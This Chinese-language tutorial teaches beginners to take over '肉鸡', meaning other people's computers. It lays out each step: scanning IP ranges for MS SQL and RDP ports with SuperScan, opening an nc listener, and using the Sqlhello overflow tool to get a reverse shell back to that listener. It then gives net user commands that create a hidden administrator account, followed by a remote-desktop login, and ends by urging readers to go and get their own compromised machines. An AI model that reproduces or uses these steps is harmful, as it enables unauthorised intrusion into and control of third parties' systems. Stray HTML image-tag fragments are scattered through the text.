近年来,计算机安全防护能力持续提升,早年随处可见的弱口令“肉鸡”如今几乎销声匿迹。这确实反映了安全水平的进步——但这是否意味着新手抓肉鸡已变成“天方夜谭”?答案当然是否定的。具体如何操作,继续往下看就能掌握。
小提示:所谓“肉鸡”,指的是网络上已被你成功入侵的主机,它完全受你控制,你可以像操作本地电脑一样对它进行任意操作。
一、踩点扫描——寻找目标
俗话说:知己知彼,百战百胜。在网络中攻破一台主机,道理相同。换句话说,拥有一款强劲的扫描探测工具,才是成功入侵的关键所在。
首先,从网上下载大名鼎鼎的SuperScan端口扫描工具。解压后双击主程序图标,弹出SuperScan操作界面(如图1)。在左侧的“开始IP”和“结束IP”处输入想要扫描的肉鸡IP网段,然后选择要扫描的服务。单击右上角“端口列表设置”按钮,进入“自定义端口”窗口,在“端口”处输入1433,单击“增加”,编辑区会出现红色字体的1433端口,双击它,前面会打上“√”标志,表示添加完毕。接着按同样的步骤添加3389端口。单击“保存”按钮,选择端口列表,返回主界面。在扫描类型中选择“All selected port in list”单选按钮,点击“开始”按钮,启动检测。稍等片刻,在所设网段中符合条件的主机会立刻出现在下方编辑区域。
500)this.width=500" title="点击这里用新窗口浏览图片" />
图 1
二、天罗地网——监听端口
既然“柔弱”的主机已经被扫描器“撕破了脸皮”,接下来要做的就是布下“天罗地网”,等待那些含有漏洞的目标主机“自投罗网”。这里用到的工具是瑞士军刀——NC监听。
为了方便讲解,假设NC工具已经下载到本地I盘。单击“开始”菜单,选择“运行”,输入“CMD”并回车,弹出命令行窗口。在光标处输入DOS跳转命令,进入NC工具所在目录,然后执行监听命令:NC –v v –l –p 1987。回车后,如果命令行下出现等待的“省略号”提示信息(如图2),说明监听本机1987端口成功。
500)this.width=500" title="点击这里用新窗口浏览图片" />
图 2
小提示:NC软件中的-vv参数代表获取更详细的输入监听内容;-l参数代表连接端口关闭后仍继续监听;-p参数用于监听本地端口,后跟的数字就是所要监听的端口号。
三、驱赶肉鸡——进入所布下的陷阱
光等着肉鸡上门,可不是聪明的办法,天知道什么时候才有主机访问到本地布下的“网罩”。所以需要使用Sqlhello攻击工具的功能,强行驱赶目标机器“中招”,加速它访问“陷阱”的效率。
此时,将正在监听的命令窗口最小化,回到Windows图形界面。在硬盘中找到事先下载的Sqlhello溢出工具所在目录。你会发现目录里多了一个1.BAT批处理文件,这其实是Sqlhello溢出工具的执行台。用“编辑”方式打开它,输入格式为:Sqlhello 目标主机IP 1433 本机IP 监听端口(如图3),然后关闭并保存文件。操作完毕后,双击1.BAT批处理文件,会快速闪过一个DOS命令窗口——批处理已经操控着Sqlhello工具开始溢出攻击了。再回到NC监听的命令窗口,等待的省略号已经变成了系统的SHELL,也就是远程主机的命令控制台。
500)this.width=500" title="点击这里用新窗口浏览图片" />
图 3
小提示:SHELL是操作系统的最外层,管理着你与操作系统交互、通讯、执行等操作。一旦得到对方的SHELL,就意味着你拥有了与对方计算机直接沟通、下达命令的平台。
在命令行下输入Net User Administrators Wenpeng 123456 /ADD,就可以建立一个属于自己名为“Wenpeng”、密码是123456的普通帐户。接着输入Net Localgroup Administrators wenpeng /add并回车,提示命令成功完成,即完成权限提升。最后使用本机自带的远程终端软件,输入刚才溢出的IP以及建立/提升的用户,进行“远程连接”登录。稍等片刻,屏幕上会立刻出现非常直观的肉鸡桌面(如图4)。
500)this.width=500" title="点击这里用新窗口浏览图片" />
图 4
至此,被攻破的主机已经完全“任你摆布”,操作起来和本地电脑一样得心应手。这样理想的肉鸡,谁会错过呢?不妨按照本文提供的方法,去获取自己“梦寐以求”的肉鸡吧。
